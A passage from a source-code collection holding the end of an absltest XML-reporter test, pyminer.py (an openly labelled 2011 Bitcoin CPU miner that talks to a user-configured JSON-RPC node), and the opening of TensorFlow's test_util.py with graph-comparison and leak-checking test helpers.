'error': 'setUpClass Errored!'}]}])
def test_tear_down_class_error(self):
self._run_test(
flag='--tear_down_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'},
{'name': 'tearDownClass',
'classname': '__main__.FailableTest',
'error': 'tearDownClass Errored!'}]}])
def test_set_up_error(self):
self._run_test(
flag='--set_up_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Errored!'}]}])
def test_tear_down_error(self):
self._run_test(
flag='--tear_down_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Errored!'}]}])
def test_test_error(self):
self._run_test(
flag='--test_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'test Errored!'}]}])
def test_set_up_failure(self):
if six.PY2:
# A failure in setUp() produces an error (not a failure), which is
# inconsistent with the Python unittest documentation. In Python
# 2.7, the bug appears to be in unittest.TestCase.run() method.
# Although it correctly checks for a SkipTest exception, it does
# not check for a failureException.
self._run_test(
flag='--set_up_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Failed!'}]}])
else:
self._run_test(
flag='--set_up_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'setUp Failed!'}]}])
def test_tear_down_failure(self):
if six.PY2:
# See comment in test_set_up_failure().
self._run_test(
flag='--tear_down_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Failed!'}]}])
else:
self._run_test(
flag='--tear_down_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'tearDown Failed!'}]}])
def test_test_fail(self):
self._run_test(
flag='--test_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'test Failed!'}]}])
def test_test_randomization_seed_logging(self):
# We expect the resulting XML to start as follows:
# <testsuites ...>
# <properties>
# <property name="test_randomize_ordering_seed" value="17" />
# ...
#
# which we validate here.
out = self._run_test_and_get_xml('--test_randomize_ordering_seed=17')
expected_attrib = {'name': 'test_randomize_ordering_seed', 'value': '17'}
property_attributes = [
prop.attrib for prop in out.findall('./properties/property')]
self.assertIn(expected_attrib, property_attributes)
if __name__ == '__main__':
absltest.main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9824
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import _pywrap_stacktrace_handler
from tensorflow.python import _pywrap_util_port
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except:
pass
def _get_object_count_by_type():
return collections.Counter([type(obj).__name__ for obj in gc.get_objects()])
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
warmup_iters: The numer of warmup iterations, excluded from measuring.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# Some objects are newly created by _get_object_count_by_type(). So
# create and save as a dummy variable to include it as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
obj_count_by_type = _get_object_count_by_type()
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = _get_object_count_by_type() - obj_count_by_type
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
